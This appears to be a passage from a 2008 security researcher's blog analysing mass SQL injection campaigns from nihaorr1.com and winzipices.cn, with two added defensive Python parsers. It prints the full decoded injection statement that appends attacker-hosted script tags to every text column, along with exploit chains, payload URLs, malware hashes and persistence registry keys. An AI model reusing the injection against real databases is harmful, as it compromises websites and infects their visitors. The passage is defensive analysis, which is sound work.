nihaorr1.com has been used in SQL injection attacks since at least April 2008. The domain was also the source of the automated Chinese CLI/SQL injection tool posted at SANS.

SQL injection attack:

Injected SQL Statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(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

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'' script src=http: //www[dot]nihaorr1[dot]com/1.js script ''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

nihaorr1.com site code:
The injected script www[dot]nihaorr1[dot]com/1.js returns an iframe redirect to 1.htm

1.htm returns 4 IFRAMEs to exploit code (Yahoo.php, Ms07004.htm, Ajax.htm, Ms06014.htm). The code attempts to exploit the MS06-014 (MDAC) and MS07-004 (VML) vulnerabilities. The payload for all of the exploits is http: //61[dot]188[dot]39[dot]214/1.exe, which is detected as an Infostealer.Onlinegame (Symantec) variant.

Malware Analysis:

Filename: 1.exe
MD5: 611D5549A73E1212D2F09F91A5004654
Size: 69632 bytes

1.exe creates:

C:\WINDOWS\system32\sonp32drv.dll

Filename: sonp32drv.dll
MD5: 7C73E2EB43D1C5A98A9DD3623188B2CE
Size: 45056 bytes

The following registry keys are created:

HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\sonp32drv.dll
HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}"
Type: REG_SZ

The malware deletes c:\WINDOWS\system32\drivers\etc\hosts

The malware sends exfiltrated data to 61.188.39.214 (China) TCP port 2034.

Monday, May 12, 2008

winzipices.cn SQL injection

Mass SQL injection attacks continue....

SQL Injection:

Injected SQL statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(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

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''script src="http: //winzipices[dot]cn/3.js" script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
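Every injection on this page (banner82.com, direct84.com, nihaorr1.com and winzipices.cn) hides its statement in a CAST(0x... AS VARCHAR/NVARCHAR) literal, so reading it out of a web log means un-URL-encoding the request and turning the hex back into text. The decoder below is an added example, not a tool from the original posts: NVARCHAR literals are UTF-16LE and VARCHAR literals single-byte, and when the "AS ..." part has been truncated from the log (as in the direct84.com request above) it guesses the width from the zero bytes. The sample request and the .invalid script host are constructed.

```python
"""Decode the CAST(0x...) hex literal of an injected SQL statement from a
logged request and list any script src= URLs it injects. Added example; the
sample request is constructed around the statement fragment shown above."""
import re
from urllib.parse import unquote_plus

# The "AS [N]VARCHAR" part is optional so that a request truncated right after
# the hex digits still decodes.
CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)(?:\s+AS\s+(N?VARCHAR))?", re.IGNORECASE)


def decode_cast_hex(hexdigits, nvarchar=None):
    """Turn the hex digits of a CAST literal back into text.

    nvarchar=True decodes UTF-16LE, False single-byte; None guesses from the
    zero bytes an NVARCHAR literal has at every odd position."""
    hexdigits = hexdigits[: len(hexdigits) // 2 * 2]   # drop a dangling nibble
    raw = bytes.fromhex(hexdigits)
    if nvarchar is None:
        nvarchar = len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])
    return raw.decode("utf-16-le") if nvarchar else raw.decode("latin-1")


def decode_injection(request):
    """Find the CAST literal in a logged request and return the decoded SQL,
    or None when the request carries no such literal."""
    text = unquote_plus(request)
    m = CAST_RE.search(text)
    if not m:
        return None
    kind = m.group(2)
    return decode_cast_hex(m.group(1), nvarchar=None if kind is None else kind.upper() == "NVARCHAR")


def injected_script_urls(sql):
    """Pull script src= targets out of a decoded statement (the IoC to block)."""
    return re.findall(r"script\s+src=\"?\s*(https?://[^\s\"'<>]+)", sql, re.IGNORECASE)


# Constructed sample: the fragment shown above, hex-encoded as an NVARCHAR
# literal and URL-encoded the way an IIS log would record it.
FRAGMENT = "DECLARE @T varchar(255),@C varchar(255) DECLARE"
SAMPLE_REQUEST = ("GET /page.asp?id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
                  + FRAGMENT.encode("utf-16-le").hex().upper()
                  + "%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1")

if __name__ == "__main__":
    print(decode_injection(SAMPLE_REQUEST))
```

Pointed at a log, the decoded statements show which tables the injection targeted and injected_script_urls() gives the hosts to block and to grep the database for.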

The SQL injection appears to come from the automated CLI/SQL injection tool referenced at SANS. The user-agent utilized during injection was: Mozilla/3.0+(compatible;+Indy+Library)

winzipices.cn site code:
injected script: http: //winzipices[dot]cn/3.js

3.js returns iframe for http: //winzipices[dot]cn/3.asp

3.asp returns iframes for pp.htm and s.asp and a tracking script for http: //s126[dot]cnzz[dot]com/stat.php?id=888134&web_id=888134&show=pic1

pp.htm returns script reference for pp.js

pp.js does a browser check. IE6 goes to 6.gif, IE7 goes to 7.gif

6.gif returns a script reference for vv.js and iframes for le.gif, old.gif and xin.gif

7.gif returns iframes for old.gif and xin.gif

le.gif and vv.js return MDAC (MS06-014) exploit
old.gif returns RealPlayer exploit (CVE-2007-5601)
xin.gif returns RealPlayer exploit (CVE-2008-1309)

Payload for all is: http: //61[dot]188[dot]38[dot]158/images/test.exe

Malware Analysis:

Filename: test.exe
MD5: afdb42512a91ae960d07397226f24494
Size: 27.5 KB (28,237 bytes)

The file test.exe copies itself as c:\WINDOWS\Tasks\0x01xx8p.exe, hooks itself into spoolsv.exe, and receives instructions from http: //766598[dot]com/config.txt (222.187.105.196).

GET /config.txt HTTP/1.1
User-Agent: Downing
Host: 766598.com
Cache-Control: no-cache

config.txt returns commands for several connections:
http: //61[dot]188[dot]38[dot]158/images/test.exe
http: //winzipices[dot]cn/1.exe
http: //766598[dot]com/tongji/post.asp

new test.exe:
Filename: test.exe
MD5: 8ca53bf2b7d8107d106da2da0f8ca700
Size: 27.5 KB (28,237 bytes)

Filename: 1.exe (PSW.OnlineGames trojan)
MD5: 5c9322a95aaafbfabfaf225277867f5b
Size: 37.5 KB (38,400 bytes)

1.exe creates three .tmp files, datx.tmp (where x is a number), with hooks into winlogin.exe

Filename: dat6.tmp
MD5: 96ee4d2d791d123c87692a5e838ed549
Size: 12.0 KB (12,288 bytes)

Filename: dat7.tmp
MD5: 9473d4397a0793c709a4ec365fb3f0d3
Size: 21.5 KB (22,016 bytes)

Filename: dat8.tmp
MD5: 69d308d862fefa4548d87545b387dda9
Size: 6.50 KB (6,656 bytes)

Registry:
HKEY_CLASSES_ROOT\CLSID\{E25C29AB-12B9-4523-A53C-324B5FBA648C}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Shell"
Type: REG_SZ
Data: "C:\WINDOWS\System32\Rundll32.exe" "C:\WINDOWS\System32\shell32.dll",Control_RunDLL "C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp"
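The registry listings in these posts (backow.dll, aspimgr.exe, sonp32drv.dll, dat6.tmp) all follow the same Key "Value" / Type: / Data: layout, and the persistence they record is the same handful of mechanisms: a Run key, a ShellExecuteHooks entry, a new service ImagePath, or a COM InProcServer32 pointing at a DLL in a Temp directory. The parser below, added as an example and not code from the original posts, turns such a listing into records and flags those mechanisms, which is how a reviewer triages a sandbox registry diff. The listing it runs on is a constructed excerpt with placeholder GUIDs and filenames modelled on the ones above.

```python
"""Parse 'Key "Value" / Type: / Data:' registry listings of the kind shown in
the posts and flag the entries that establish persistence. Added example; the
listing below is constructed with placeholder GUIDs and file names."""
import re

SAMPLE_LISTING = r"""HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\username\LOCALS~1\Temp\example.dll
HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{00000000-0000-0000-0000-000000000001}"
Type: REG_SZ
Data:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\examplesvc "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\examplesvc.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Shell"
Type: REG_SZ
Data: "C:\WINDOWS\System32\Rundll32.exe" "C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp"
"""

# A key line: hive\path followed by the quoted value name.
KEY_RE = re.compile(r'^(HKEY_[A-Z_]+\\\S.*?)\s+"([^"]*)"\s*$')

# Directories an unprivileged user can write to; a DLL or EXE loaded from one
# of these is the pattern in the posts above.
USER_WRITABLE = re.compile(
    r"\\(Temp|LOCALS~1|Local Settings|Documents and Settings|DOCUME~1|Tasks)\\",
    re.IGNORECASE)


def parse_listing(text):
    """Return one dict per value: key, value, type, data ('' when Data: is empty)."""
    records, cur = [], None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            cur = {"key": m.group(1), "value": m.group(2), "type": "", "data": ""}
            records.append(cur)
        elif cur is not None and line.startswith("Type:"):
            cur["type"] = line[5:].strip()
        elif cur is not None and line.startswith("Data:"):
            cur["data"] = line[5:].strip()
    return records


def persistence_findings(records):
    """Return (reason, key, data) for every record that looks like persistence."""
    out = []
    for r in records:
        k, d = r["key"].lower(), r["data"]
        if "\\currentversion\\run" in k:                     # Run / RunOnce
            out.append(("run-key", r["key"], d))
        elif "\\explorer\\shellexecutehooks" in k:          # loaded on every ShellExecute
            out.append(("shellexecutehook", r["key"], d))
        elif "\\services\\" in k and r["value"].lower() == "imagepath":
            out.append(("new-service", r["key"], d))
        elif k.endswith("\\inprocserver32") and USER_WRITABLE.search(d):
            out.append(("com-dll-in-temp", r["key"], d))
    return out


if __name__ == "__main__":
    for reason, key, data in persistence_findings(parse_listing(SAMPLE_LISTING)):
        print(f"{reason:18} {key}  ->  {data}")
```

The ShellExecuteHooks case carries no data of its own: the CLSID in the value name is what matters, and the parser keeps it in the value field so the InProcServer32 entry it points to can be matched up.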

...all in an effort to drop a PSW.OnlineGames trojan